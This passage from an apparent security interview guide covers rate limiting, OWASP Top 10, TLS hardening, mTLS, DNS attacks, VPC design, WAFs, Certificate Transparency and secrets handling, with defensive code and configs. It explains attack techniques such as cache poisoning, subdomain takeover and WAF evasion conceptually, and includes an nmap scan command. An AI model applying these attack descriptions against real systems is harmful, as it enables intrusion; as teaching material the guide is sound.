        headers["Retry-After"] = str(max(1, reset_at - int(time.time())))
    return count <= limit, headers
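A fixed window lets a client send up to 2× the limit across a window boundary. A token bucket smooths this: it permits bursts up to a capacity, then sustains a steady refill rate. Below is a minimal single-process sketch. The class name and parameters are illustrative. A multi-instance deployment would keep the same state in Redis and update it atomically, typically with a Lua script.

```python
import time


class TokenBucket:
    """In-memory token bucket: bursts up to `capacity`, refilled at `rate` tokens/second."""

    def __init__(self, capacity: float, rate: float, clock=time.monotonic):
        self.capacity = capacity
        self.rate = rate
        self.clock = clock            # injectable for testing
        self.tokens = capacity        # start full
        self.updated = clock()

    def allow(self, cost: float = 1.0) -> bool:
        now = self.clock()
        # Refill in proportion to elapsed time, never above capacity
        self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= cost:
            self.tokens -= cost
            return True
        return False
```

For example, TokenBucket(capacity=3, rate=1.0) allows three immediate requests, rejects a fourth, and allows one more request per second afterwards.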

10What is the OWASP Top 10 and how does it guide security priorities?

The OWASP Top 10 (2021 edition) identifies the most critical web application security risks, based on real-world data from security assessments and CVE databases.

A01 — Broken Access Control: IDOR, BOLA, privilege escalation, missing authorization checks. The most common critical finding.
A02 — Cryptographic Failures: Weak encryption, unencrypted sensitive data in transit or at rest, poor key management.
A03 — Injection: SQLi, command injection, LDAP injection, and XSS (merged into Injection in 2021). Classic and still prevalent.
A04 — Insecure Design: Missing threat modeling, lack of security requirements, insecure architecture patterns.
A05 — Security Misconfiguration: Default credentials, overly permissive CORS, verbose error messages, open cloud storage buckets, and XXE (merged here in 2021).
A06 — Vulnerable and Outdated Components: Log4Shell, Heartbleed, and the Equifax breach (unpatched Apache Struts) all exploited known CVEs in third-party components.
A07 — Identification and Authentication Failures: Credential stuffing, weak passwords, improper session management.
A08 — Software and Data Integrity Failures: Insecure deserialization, unverified updates, CI/CD pipeline compromise.
A09 — Security Logging and Monitoring Failures: Not detecting attacks, insufficient audit logs, no alerting.
A10 — Server-Side Request Forgery (SSRF): Added in 2021 — high frequency in modern cloud architectures.

Also watch: the OWASP API Security Top 10 (2023). It covers API-specific issues such as BOLA, Broken Object Property Level Authorization (which absorbed Mass Assignment), and Unrestricted Resource Consumption, all highly relevant for microservices.

TLS & Network Security

7 questions

1How does TLS 1.3 handshake work? What changed from TLS 1.2?

TLS (Transport Layer Security) provides encrypted, authenticated, and integrity-protected communication. TLS 1.3 (RFC 8446, 2018) is a major redesign that's faster, simpler, and more secure than 1.2.

TLS 1.3 handshake (1-RTT):

# Client → Server: ClientHello
# Contains: supported_versions, cipher suites, key_share (ECDHE public key),
#           supported_groups (curves), pre_shared_key (resumption ticket) for resumption/0-RTT

# Server → Client: ServerHello + {EncryptedExtensions + Certificate + CertificateVerify + Finished}
# ServerHello: chosen cipher suite, key_share (server's ECDH public key)
# Both sides derive shared secret: ECDHE(client_private, server_public)
# Everything after ServerHello is encrypted with derived keys

# Client → Server: {Finished} [+ Application Data]
# Total: 1 RTT (vs 2 RTT in TLS 1.2)

# 0-RTT (Early Data): client can send app data with the first message
# using a pre-shared key from previous session (session resumption)
# Trade-off: no forward secrecy for early data, replay attacks possible
# Use only for idempotent, non-state-changing requests (e.g. GET)

TLS 1.3 improvements over 1.2:

Reduced handshake: 1 RTT (vs 2 RTT in 1.2). 0-RTT session resumption.
Forward secrecy mandatory: All key exchange uses ephemeral ECDHE — no static RSA key exchange.
Removed weak algorithms: No RSA key exchange, no CBC cipher suites, no SHA-1, no RC4, no DES/3DES, no MD5.
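AEAD-only cipher suites: Only AEAD ciphers remain (AES-GCM, ChaCha20-Poly1305, AES-CCM).
Encrypted more of the handshake: The certificate is encrypted, hiding it from passive observers. The SNI in ClientHello still reveals the hostname unless Encrypted Client Hello (ECH) is used.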
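On the client side, Python's standard ssl module can require TLS 1.3 and report what was actually negotiated. This is a sketch. The function names are hypothetical, and negotiated() needs network access, so it is defined here but not called.

```python
import socket
import ssl


def tls13_client_context() -> ssl.SSLContext:
    # create_default_context() already enables certificate + hostname verification
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3   # refuse TLS 1.2 and below
    return ctx


def negotiated(host: str, port: int = 443) -> tuple[str, str]:
    """Connect and return (protocol version, cipher suite name)."""
    ctx = tls13_client_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.version(), tls.cipher()[0]
```

Against a TLS 1.3 server, negotiated("example.com") should return "TLSv1.3" along with one of the AEAD suites listed above. Against a server limited to TLS 1.2, the handshake fails instead of silently downgrading.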

2What are common TLS misconfigurations? How do you test and harden TLS deployments?

# Common misconfigurations:
# 1. Supporting old protocol versions:
#    SSLv3: POODLE attack (2014)
#    TLS 1.0/1.1: BEAST, POODLE TLS, deprecated by RFC 8996

# nginx hardened TLS config:
ssl_protocols TLSv1.2 TLSv1.3;           # disable 1.0 and 1.1
# TLS 1.2 cipher list (a single argument, so keep it on one line):
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305;
ssl_prefer_server_ciphers off;            # every listed cipher is strong, so let the client pick
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:10m;
ssl_session_tickets off;                  # unrotated ticket keys undermine forward secrecy

# HSTS header
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;

# OCSP Stapling — server fetches and caches certificate revocation status
ssl_stapling on;
ssl_stapling_verify on;                   # needs the issuer chain in ssl_trusted_certificate
resolver 8.8.8.8 8.8.4.4 valid=300s;

# 2. Weak cipher suites: anything with NULL, EXPORT, anon, DES, RC4, MD5
# 3. Self-signed certs in production
# 4. Expired certificates
# 5. Missing HSTS (allows SSL-stripping downgrades to HTTP)

# Testing tools:
# testssl.sh — comprehensive CLI TLS tester
# SSL Labs server test — https://ssllabs.com/ssltest
# nmap: nmap --script ssl-enum-ciphers -p 443 target.com
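For a quick check inside your own tooling, such as a post-deploy smoke test, you can feed the protocol and cipher name from ssl.SSLSocket.version() and cipher()[0] into a classifier that mirrors misconfigurations 1 and 2 above. This is a rough sketch. The marker list is a simplification of OpenSSL cipher naming, and it complements testssl.sh or SSL Labs rather than replacing them.

```python
WEAK_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}
# Substrings of OpenSSL cipher names that indicate weak components (simplified)
WEAK_CIPHER_MARKERS = ("NULL", "EXPORT", "EXP-", "anon", "ADH", "AECDH", "DES", "RC4", "MD5")


def tls_findings(protocol: str, cipher: str) -> list[str]:
    """Return human-readable findings for a negotiated protocol/cipher pair."""
    findings = []
    if protocol in WEAK_PROTOCOLS:
        findings.append(f"deprecated protocol {protocol}")
    for marker in WEAK_CIPHER_MARKERS:
        if marker.lower() in cipher.lower():
            findings.append(f"weak cipher component {marker} in {cipher}")
    # TLS 1.3 suites (TLS_*) always use ephemeral keys; in TLS 1.2 look for (EC)DHE
    if not (cipher.startswith("TLS_") or "DHE" in cipher):
        findings.append("no forward secrecy (static RSA key exchange)")
    return findings
```

A hardened server like the nginx config above should yield an empty list for every client. A legacy pair like ("TLSv1", "AES128-SHA") yields a deprecated-protocol finding plus a missing-forward-secrecy finding.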

3What is mTLS (mutual TLS)? When do you use it in microservices?

In standard TLS, only the server authenticates to the client (via certificate). In mTLS (mutual TLS), both parties authenticate to each other — the client also presents a certificate. This provides strong workload identity without shared secrets.

# mTLS: both client and server authenticate via certificates
# Server validates: client cert is signed by trusted CA, not revoked, valid
# Client validates: server cert as usual

# Use cases in microservices:
# - Service-to-service authentication in a zero-trust network
# - Replace API keys / shared secrets between internal services
# - Meet compliance requirements for inter-service encryption (PCI-DSS, HIPAA)

# Implementation approaches:
# 1. Service mesh (most common at scale):
#    Istio / Linkerd — inject a sidecar proxy that handles mTLS transparently
#    Services communicate over loopback, sidecar handles certs and TLS
#    Automatic cert rotation, mTLS enforced without code changes

# 2. Manual cert management:
import ssl

# Server:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.crt", "server.key")
ctx.load_verify_locations("ca.crt")           # trust this CA for client certs
ctx.verify_mode = ssl.CERT_REQUIRED           # require client cert

# Client:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_cert_chain("client.crt", "client.key")  # present client cert
ctx.load_verify_locations("ca.crt")

# Certificate rotation challenge:
# Use short-lived certs (SPIFFE/SPIRE: 1-hour certs, auto-rotated)
# Or cert pinning with planned rotation windows

SPIFFE (Secure Production Identity Framework For Everyone): Standard for workload identity. Each service gets a SPIFFE ID (URI like spiffe://cluster.local/ns/default/sa/my-service) encoded in an X.509 certificate (SVID). SPIRE is the reference implementation. Istio uses SPIFFE under the hood.
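A completed mTLS handshake proves only that the peer's certificate chains to your CA. The server still has to decide which workloads may call it. Below is a sketch that authorizes on the SPIFFE ID in the peer certificate. It assumes the non-binary dict returned by ssl.SSLSocket.getpeercert() on a server socket using CERT_REQUIRED, where SAN entries appear as ("URI", value) tuples. The allow-list and function names are hypothetical.

```python
def spiffe_ids(peer_cert: dict) -> list[str]:
    """Extract spiffe:// URI SANs from a getpeercert() dict."""
    return [value for kind, value in peer_cert.get("subjectAltName", ())
            if kind == "URI" and value.startswith("spiffe://")]


def authorize_peer(peer_cert: dict, allowed: set[str]) -> str:
    ids = spiffe_ids(peer_cert)
    # An X.509-SVID carries exactly one SPIFFE ID; anything else is rejected
    if len(ids) != 1 or ids[0] not in allowed:
        raise PermissionError(f"peer not allowed: {ids}")
    return ids[0]
```

A service mesh makes the same check declaratively. In Istio, for example, an AuthorizationPolicy on principals is matched against the peer's SPIFFE identity.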

4What are DNS security risks? Explain DNS hijacking, cache poisoning, and DNSSEC.

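DNS cache poisoning (Kaminsky attack, 2008): An attacker races the legitimate answer by flooding a resolver with forged responses that try to guess the query's transaction ID. Kaminsky's variant queries random nonexistent subdomains so that every attempt is a fresh race, and the forged responses carry malicious NS records for the whole domain. Victims querying the poisoned resolver receive the attacker's IP for the targeted domain, redirecting traffic to a malicious server.

Mitigations: Source port randomization (more values to guess per forged response) and DNSSEC validation. DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT) protect only the client-to-resolver hop.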

DNS hijacking: Compromising the authoritative DNS server or registrar account to change DNS records. Results in traffic being redirected at the source. BGP hijacking extends this to route-level redirection.

# DNSSEC — signs DNS records with cryptographic signatures
# Zone signs its records: A, MX, CNAME records get RRSIG (signature)
# Chain of trust from root zone → TLD (.com) → domain
# Resolvers verify signatures before accepting records

# Limitations of DNSSEC:
# Doesn't encrypt DNS queries (still visible to observers)
# Complex to configure — key management, zone signing
# Many resolvers don't validate DNSSEC

# DNS-over-HTTPS (DoH): wraps DNS in HTTPS (port 443)
# DNS-over-TLS (DoT): encrypts DNS over TLS (port 853)
# Both prevent eavesdropping of DNS queries
# DoH is harder to block (uses same port as HTTPS)

# Subdomain takeover:
# Service A's DNS: api.example.com CNAME → old-service.provider.com
# Old service is decommissioned — CNAME now dangling
# Attacker claims old-service.provider.com → controls api.example.com!
# Attacker serves content on your domain: phishing, reading cookies scoped to .example.com
# Scan for dangling CNAMEs: dig +short api.example.com CNAME, then check whether the target still exists
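The dangling-CNAME check can be scripted over your DNS inventory. Below is a minimal sketch. It treats a CNAME target that no longer resolves as a takeover candidate, using the stdlib resolver by default, with the resolver injectable for testing. The helper name is hypothetical. One limitation: some providers keep resolving deleted resources (their endpoint returns a "not found" page instead), so this check misses those cases. Dedicated scanners also fingerprint provider error responses.

```python
import socket
from typing import Callable


def dangling_cname(cname_target: str,
                   resolve: Callable[[str], str] = socket.gethostbyname) -> bool:
    """True if the CNAME target no longer resolves (a takeover candidate)."""
    try:
        resolve(cname_target)
        return False
    except socket.gaierror:   # NXDOMAIN / no address
        return True
```

Run it for every CNAME in your zones, for example from a nightly job, and alert on any True before someone else claims the target.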

5What is network segmentation and microsegmentation? How do you design secure VPC architecture?

# VPC design — defense in depth:
# Public subnet: only load balancers, NAT gateways, bastion hosts
# Private subnet (app tier): application servers — no direct internet access
# Private subnet (data tier): databases — no internet access, accessible only from app tier

# AWS Security Groups (stateful firewall per resource):
# Web tier SG: inbound 443 from 0.0.0.0/0, outbound to App SG only
# App tier SG: inbound 8080 from Web SG only, outbound to DB SG + NAT
# DB SG: inbound 5432 from App SG only, no outbound to internet

# Network ACLs (stateless firewall per subnet):
# Additional layer: stateless, so return traffic (ephemeral ports 1024-65535) needs explicit rules in both directions
# Use to block known malicious IP ranges at subnet level

# Microsegmentation: apply security policies at individual workload level
# East-west traffic (between services within the network) is restricted
# Without: once attacker gains foothold on one service, can reach all others
# With: each service only accepts traffic from services that legitimately call it

# PrivateLink / private endpoints:
# Access AWS services (S3, DynamoDB) privately without internet/NAT
# Traffic stays within AWS backbone — no exposure to internet
# Required for compliance in many regulated industries

# VPN vs VPC peering vs PrivateLink:
# VPN: encrypt traffic over internet, for on-prem ↔ cloud
# VPC peering: private network between two VPCs (same or different accounts)
# PrivateLink: expose a service privately to another VPC without VPC peering
# Transit Gateway: hub-and-spoke for many VPCs

6What is a WAF (Web Application Firewall) and what are its limitations?

A WAF inspects HTTP traffic and blocks requests matching known attack patterns (SQLi, XSS, path traversal, etc.). It operates at Layer 7 and sits in front of your application — cloud (AWS WAF, Cloudflare), hardware (F5, Imperva), or software (ModSecurity).

# WAF capabilities:
# - Block OWASP Top 10 attack patterns (rule-based or ML-based)
# - Rate limiting / DDoS mitigation
# - Bot detection and management
# - Geo-blocking
# - Virtual patching (block exploits for known CVEs before you patch)

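# AWS WAF example rules (abridged: create-web-acl also requires --name, --scope,
# --default-action and --visibility-config; "..." elides each rule's remaining fields):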
aws wafv2 create-web-acl \
  --rules '[
    {"Name": "AWSManagedRulesSQLiRuleSet", ...},
    {"Name": "AWSManagedRulesKnownBadInputsRuleSet", ...},
    {"Name": "RateLimitRule", "Action": {"Block": {}},
     "Statement": {"RateBasedStatement": {"Limit": 2000, "AggregateKeyType": "IP"}}}
  ]'

WAF limitations — a WAF is NOT a substitute for secure code:

Bypassable: Skilled attackers encode payloads to evade rule-based WAFs. Obfuscated SQL, Unicode escaping, chunked encoding — WAF rules are a cat-and-mouse game.
False positives: Blocking legitimate traffic, especially for complex apps or APIs.
No coverage for logic flaws: IDOR, authentication bypasses, business logic errors — WAF can't understand application semantics.
TLS termination required: WAF must decrypt to inspect — adds complexity and a new trust boundary.

WAF is defense in depth — one layer of many. Fix the vulnerability, use the WAF for additional coverage and quick response to zero-days.

7What is certificate transparency and how does it help detect certificate misissue?

Certificate Transparency (CT, RFC 6962) is a public audit system for TLS certificates. Every publicly-trusted certificate must be logged in a public append-only CT log before browsers will accept it.

# CT flow:
# 1. CA issues a certificate for api.example.com
# 2. CA submits the pre-certificate to one or more CT logs
# 3. CT log returns a Signed Certificate Timestamp (SCT)
# 4. CA embeds the SCT in the final certificate
# 5. Browser checks: certificate has valid SCT from a trusted log
# 6. If no valid SCTs → CT-enforcing browsers (e.g. Chrome, Safari) reject the certificate

# Why this matters:
# Without CT: a compromised or rogue CA can issue certs for your domain
#   and you'd only know when you discovered a MITM attack
# With CT: every cert for your domain is publicly visible within seconds of issuance
#   You can monitor and detect unauthorized certs automatically

# Monitoring your domain with CT:
# crt.sh — search all certs ever issued for a domain
# Facebook CT monitoring: subscribe to alerts for your domains
# certspotter.com — real-time monitoring
# Chrome has required CT for all newly issued publicly trusted certs since April 2018

# Real example: CT logs surfaced Symantec mis-issuance (incl. unauthorized google.com certs, 2015)
# Continued problems led browsers to distrust Symantec's CA roots (2017-2018)

# CAA records (DNS): restrict which CAs can issue certs for your domain
dig CAA example.com
# example.com. CAA 0 issue "letsencrypt.org"
# example.com. CAA 0 issuewild ";"  ← no wildcard certs allowed
# Browsers don't enforce CAA, but CAs must check before issuing
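CT monitoring and CAA work well together: alert on any certificate for your domain whose issuer is not one of the CAs your CAA records allow. Below is a sketch against crt.sh's JSON output. It assumes the endpoint https://crt.sh/?q=%25.<domain>&output=json and the "issuer_name" field as crt.sh returns them at the time of writing, so treat both as assumptions. fetch_ct_entries needs network access and is not called here.

```python
import json
import urllib.parse
import urllib.request


def fetch_ct_entries(domain: str) -> list[dict]:
    # "%" is crt.sh's wildcard; quote() encodes it as %25 (all subdomains)
    url = "https://crt.sh/?q=" + urllib.parse.quote(f"%.{domain}") + "&output=json"
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.load(resp)


def unexpected_issuers(entries: list[dict], allowed_issuer_substrings: list[str]) -> list[dict]:
    """Entries whose issuer matches none of the CAs you actually use (assumed field name)."""
    return [e for e in entries
            if not any(s in e.get("issuer_name", "") for s in allowed_issuer_substrings)]
```

With CAA 0 issue "letsencrypt.org" as above, the allow-list would be something like ["Let's Encrypt"], and any other issuer is worth investigating.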

Secrets Management

7 questions

1What is secrets sprawl and how does a dedicated secrets manager solve it?

Secrets sprawl: Credentials scattered across config files, environment variables, CI logs, container images, source code, and Slack messages. When one location is compromised or needs rotation, you don't know all the places to update.

What a secrets manager provides:

Centralized storage: All secrets in one auditable place
Access control: Fine-grained ACLs — service A can only read database password X, not API key Y
Audit log: Who accessed which secret and when — critical for compliance and incident response
Automatic rotation: Generate new credentials on a schedule, update all dependent services
Encryption at rest and in transit: Secrets encrypted with hardware-protected keys (HSM)
Dynamic secrets: Generate short-lived credentials on demand (e.g., Vault issues a DB credential valid for 1 hour)

# HashiCorp Vault — dynamic DB credentials:
vault read database/creds/my-role
# Returns (example values): username=v-app-AbC123, password=rAnD0m, lease_duration=1h
# Vault revokes the credentials when the lease expires (unless renewed)
# If a service is compromised, its credentials expire without manual rotation

# AWS Secrets Manager — automatic rotation:
aws secretsmanager create-secret --name db/prod/password --secret-string "oldpassword"
aws secretsmanager rotate-secret --secret-id db/prod/password \
  --rotation-lambda-arn arn:aws:lambda:... --rotation-rules '{"AutomaticallyAfterDays": 30}'

# Application retrieval:
import boto3
client = boto3.client('secretsmanager')
secret = client.get_secret_value(SecretId='db/prod/password')['SecretString']
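Calling get_secret_value on every request adds latency and API cost, so applications usually cache the value briefly. The sketch below wraps any fetch function in a small TTL cache. CachedSecret is a hypothetical name. AWS also publishes a caching client for Python (aws-secretsmanager-caching) that handles this more completely. A short TTL bounds how long the app keeps using a rotated-out value.

```python
import time
from typing import Callable, Optional


class CachedSecret:
    """Cache a secret for `ttl` seconds so each request doesn't hit the secrets API."""

    def __init__(self, fetch: Callable[[], str], ttl: float = 300.0, clock=time.monotonic):
        self._fetch, self._ttl, self._clock = fetch, ttl, clock
        self._value: Optional[str] = None
        self._expires = 0.0

    def get(self) -> str:
        now = self._clock()
        if self._value is None or now >= self._expires:
            self._value = self._fetch()          # refresh from the secrets manager
            self._expires = now + self._ttl
        return self._value
```

Usage with the client above: db_password = CachedSecret(lambda: client.get_secret_value(SecretId='db/prod/password')['SecretString']), then call db_password.get() wherever the value is needed.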

2How do you handle secrets in Kubernetes? Compare Kubernetes Secrets, Sealed Secrets, and external secret operators.

# Kubernetes Secrets — base64 encoded, NOT encrypted by default!
apiVersion: v1
kind: Secret
metadata: { name: db-secret }
type: Opaque
data:
  password: cGFzc3dvcmQ=   # base64("password") — anyone with kubectl access reads this

# Enable encryption at rest (etcd-level):
# kube-apiserver --encryption-provider-config=/etc/kubernetes/encryption.yaml
# Encrypts secrets in etcd using AES-GCM or KMS (AWS, GCP, Azure)
# Still readable by anyone with kubectl get secret — only protects etcd disk

# Sealed Secrets (Bitnami):
# Asymmetric encryption — SealedSecret can only be decrypted by the cluster controller
# Safe to commit to git: only the in-cluster controller can turn a SealedSecret back into a v1 Secret
kubeseal --cert pub-cert.pem --format yaml < secret.yaml > sealed-secret.yaml  # encrypt
# git commit sealed-secret.yaml  ← safe to commit
# kubectl apply -f sealed-secret.yaml  → controller creates the real Secret

# External Secrets Operator (ESO) — recommended approach:
# Syncs secrets from external stores (AWS SM, Vault, GCP SM) into K8s Secrets
# Secret lives in the external store (rotatable, auditable)
# ESO creates/updates K8s Secret automatically
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata: { name: db-secret }
spec:
  secretStoreRef: { name: aws-secretsmanager, kind: SecretStore }
  target: { name: db-secret }
  data:
  - secretKey: password
    remoteRef: { key: db/prod, property: password }

# Workload identity (no secrets at all — best approach):
# Pod gets AWS IAM role via IRSA (IAM Roles for Service Accounts)
# Pod calls AWS APIs using temporary credentials — no secret to manage
# GKE Workload Identity, Azure Workload Identity work the same way
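To see why a plain Kubernetes Secret is not encrypted, decode the data block of the manifest above. No key is involved, so anyone who can read the object can recover the plaintext. This is the same result as kubectl get secret db-secret -o jsonpath='{.data.password}' | base64 -d. The helper name is hypothetical.

```python
import base64


def decode_secret_data(data: dict[str, str]) -> dict[str, str]:
    """Decode a Secret's `data` map: base64 is an encoding, not encryption."""
    return {key: base64.b64decode(value).decode() for key, value in data.items()}


print(decode_secret_data({"password": "cGFzc3dvcmQ="}))
```

This is why RBAC on get/list for secrets matters as much as etcd encryption does.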

3How do you prevent secrets from leaking in CI/CD pipelines and git history?

# Prevention tools:
# 1. pre-commit hooks — scan before commit
pip install detect-secrets
detect-secrets scan > .secrets.baseline
# Add to .pre-commit-config.yaml:
# - repo: https://github.com/Yelp/detect-secrets
#   hooks: [{id: detect-secrets, args: [--baseline, .secrets.baseline]}]

# 2. git-secrets (AWS Labs) — prevents AWS keys from being committed
git secrets --install
git secrets --register-aws

# 3. truffleHog / gitleaks — scan git history for secrets
gitleaks detect --source . --verbose
trufflehog git file://. --only-verified  # only report confirmed live credentials

# 4. GitHub Advanced Security / GitLab Secret Detection — built-in scanning

# If a secret was committed:
# 1. Revoke the credential IMMEDIATELY — assume it was seen
# 2. Remove from git history (but this doesn't help if already public):
git filter-repo --path secrets.env --invert-paths  # remove file from all history
# Or BFG Repo-Cleaner: bfg --delete-files secrets.env
# 3. Force push all branches (coordinate with team)
# 4. Update every downstream consumer to the new credential

# CI/CD best practices:
# - Never print env vars in CI logs: set +x in bash before using secrets
# - Mask secrets in CI output (GitHub Actions, GitLab CI do this automatically)
# - Use OIDC federation for CI → cloud access (no stored cloud credentials!)
# GitHub Actions → AWS:
# permissions: id-token: write  # get OIDC token
# aws-actions/configure-aws-credentials with role-to-assume
# No AWS_ACCESS_KEY_ID in GitHub Secrets needed
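To illustrate what the scanners above do at their core, here is a deliberately tiny pattern-based checker for two well-known formats. This is a toy sketch, not a replacement for detect-secrets or gitleaks, which add entropy checks, many more rules, and live verification. The function names are hypothetical. Wired into a pre-commit hook, a non-zero return value from main() would block the commit.

```python
import re

# AWS access key IDs: "AKIA" (long-term) or "ASIA" (temporary) + 16 uppercase alphanumerics
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
PRIVATE_KEY = re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")


def find_secrets(text: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if AWS_KEY_ID.search(line):
            hits.append((lineno, "aws-access-key-id"))
        if PRIVATE_KEY.search(line):
            hits.append((lineno, "private-key"))
    return hits


def main(paths: list[str]) -> int:
    found = False
    for path in paths:
        with open(path, encoding="utf-8", errors="ignore") as f:
            for lineno, rule in find_secrets(f.read()):
                print(f"{path}:{lineno}: possible {rule}")
                found = True
    return 1 if found else 0   # non-zero exit fails the hook
```

Pattern rules like these produce false positives on documentation examples (e.g. AWS's published AKIAIOSFODNN7EXAMPLE). That is why real tools keep a reviewed baseline file.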

4What is envelope encryption and how do cloud KMS systems implement it?

Encrypting large amounts of data directly with a KMS key would be slow and expensive (one KMS API call per operation), and AWS KMS Encrypt accepts at most 4 KB of plaintext anyway. Envelope encryption uses a local data encryption key (DEK) for the actual data and wraps (encrypts) the DEK with the KMS key.

# Envelope encryption pattern:
# 1. Generate a random DEK (Data Encryption Key) locally
# 2. Encrypt your data with the DEK (AES-256-GCM — fast, local operation)
# 3. Encrypt the DEK with the KMS CMK (Customer Master Key) — one API call
# 4. Store: encrypted_data + encrypted_DEK together
# 5. Decrypt: call KMS to decrypt DEK → use DEK to decrypt data

import boto3
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

kms = boto3.client('kms')
KEY_ID = 'arn:aws:kms:us-east-1:123456789:key/abc123'

def encrypt(plaintext: bytes) -> dict:
    # Generate a random 256-bit DEK
    dek = os.urandom(32)
    nonce = os.urandom(12)

    # Encrypt data locally with DEK
    encrypted_data = AESGCM(dek).encrypt(nonce, plaintext, None)

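    # Wrap DEK with KMS (one API call). Alternative: kms.generate_data_key(KeyId=KEY_ID,
    # KeySpec='AES_256') returns the DEK in both plaintext and wrapped form in a single call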
    response = kms.encrypt(KeyId=KEY_ID, Plaintext=dek)
    encrypted_dek = response['CiphertextBlob']

    return {'data': nonce + encrypted_data, 'dek': encrypted_dek}

def decrypt(envelope: dict) -> bytes:
    # Unwrap DEK via KMS
    response = kms.decrypt(CiphertextBlob=envelope['dek'])
    dek = response['Plaintext']

    # Decrypt data locally
    nonce, ciphertext = envelope['data'][:12], envelope['data'][12:]
    return AESGCM(dek).decrypt(nonce, ciphertext, None)

# Benefits:
# KMS key never leaves the HSM — only DEK is transmitted to application
# Bulk data encrypted locally — fast, no KMS API rate limits
# Key rotation: re-encrypt the DEK with a new KMS key (not re-encrypt all data)

5How do you implement secret rotation without downtime? What is the dual-secret pattern?

# Secret rotation challenge:
# If you change a DB password and not all services reload simultaneously → outage

# Pattern 1: Dual-credential rotation (AWS Secrets Manager's "alternating users" strategy
#            gets the same effect with two DB users):
# Phase 1: Create new credentials alongside old ones (DB user has two passwords)
# Phase 2: Update all consumers to use new credentials (rolling deploy)
# Phase 3: Revoke old credentials

-- Phase 1: DB accepts both old and new password (MySQL 8.0.14+ dual passwords)
ALTER USER 'app_user'@'%' IDENTIFIED BY 'new_password' RETAIN CURRENT PASSWORD;

-- Phase 2: Deploy new application config with new password
-- Phase 3: After all instances are updated:
ALTER USER 'app_user'@'%' DISCARD OLD PASSWORD;

# Pattern 2: Connection pool with credential refresh
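import time

class RotatingConnectionPool:
    """Rebuilds the pool when the secret version changes
    (secrets_manager and create_new_pool are hypothetical helpers)."""
    CHECK_INTERVAL = 60  # seconds; avoids a secrets API call per connection

    def __init__(self):
        self._secret_version = None
        self._pool = None
        self._last_check = 0.0

    def get_connection(self):
        now = time.monotonic()
        if self._pool is None or now - self._last_check >= self.CHECK_INTERVAL:
            self._last_check = now
            current_version = secrets_manager.get_version("db/password")
            if current_version != self._secret_version:
                old_pool = self._pool
                self._pool = create_new_pool(secrets_manager.get("db/password"))
                self._secret_version = current_version
                if old_pool: old_pool.close()  # old password still valid until Phase 3
        return self._pool.get_connection()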

# Pattern 3: Short-lived dynamic credentials (Vault lease model)
# Vault generates unique credentials per service instance with 1-hour TTL
# Rotation = let old credentials expire naturally
# No coordination needed across services

# Rotation triggers:
# Scheduled: every 30/90 days
# Reactive: on suspected compromise, employee offboarding, service decommission
# Event-driven: after a security scan detects public exposure
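The dual-password pattern avoids downtime because at every moment during the rollout, each instance's password is one the database accepts. The in-memory simulation below checks that property. FakeDatabaseUser and rolling_rotation are hypothetical stand-ins for a real database account and deploy process.

```python
class FakeDatabaseUser:
    """Hypothetical DB account that can hold a current and a retained old password."""

    def __init__(self, password: str):
        self.current, self.previous = password, None

    def rotate(self, new_password: str) -> None:   # Phase 1: new password, old one retained
        self.previous, self.current = self.current, new_password

    def discard_old(self) -> None:                 # Phase 3: old password stops working
        self.previous = None

    def login(self, password: str) -> bool:
        return password == self.current or (self.previous is not None and password == self.previous)


def rolling_rotation(user: FakeDatabaseUser, fleet: list[dict], new_password: str) -> list[bool]:
    """Rotate while every instance keeps logging in; return all login results observed."""
    results = []
    user.rotate(new_password)                      # Phase 1
    for instance in fleet:                         # Phase 2: rolling deploy, one at a time
        instance["password"] = new_password
        results.extend(user.login(i["password"]) for i in fleet)
    user.discard_old()                             # Phase 3
    results.extend(user.login(i["password"]) for i in fleet)
    return results
```

If Phase 3 ran before the rollout finished, some logins in the results list would be False. That is the outage the pattern exists to prevent.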

6How do you securely pass secrets to containers and serverless functions?

# Anti-patterns (avoid):
# 1. Baking secrets into container images
#    docker history myapp:latest shows ENV commands!
#    Leaked in image layers, registries, scanning tools

# 2. Secrets as environment variables set at build time
#    Visible in docker inspect, /proc/<pid>/environ, image metadata, CI logs

# Recommended approaches:

# 1. Secrets manager SDK at runtime (best for sensitive secrets):
import boto3
def get_db_password():
    client = boto3.client('secretsmanager')
    return client.get_secret_value(SecretId='db/prod')['SecretString']
# Requires container to have IAM role (ECS task role, K8s IRSA)
# Secret never stored in the container image or env vars

# 2. Volume-mounted secrets (Kubernetes, Docker Swarm):
# K8s ExternalSecret → K8s Secret → mounted as files, one per key (here /run/secrets/password)
# tmpfs mount: secret in memory only, not written to disk
volumes:
- name: db-secret
  secret: { secretName: db-secret }
containers:
- volumeMounts:
  - name: db-secret
    mountPath: /run/secrets
    readOnly: true

# 3. Init container / sidecar (Vault Agent Injector):
# Vault sidecar authenticates and writes secrets to shared volume before main container starts
# Main container reads secrets from /vault/secrets/ — no Vault SDK needed

# AWS Lambda:
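# Option A: Lambda environment variables (encrypted at rest with KMS automatically,
#   but typically visible to anyone who can read the function configuration)
# Option B: SSM Parameter Store at cold start (module-level code runs once per execution environment):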
import boto3, os
ssm = boto3.client('ssm')
DB_PASS = ssm.get_parameter(Name='/prod/db/password', WithDecryption=True)['Parameter']['Value']

# Serverless Framework:
provider:
  environment:
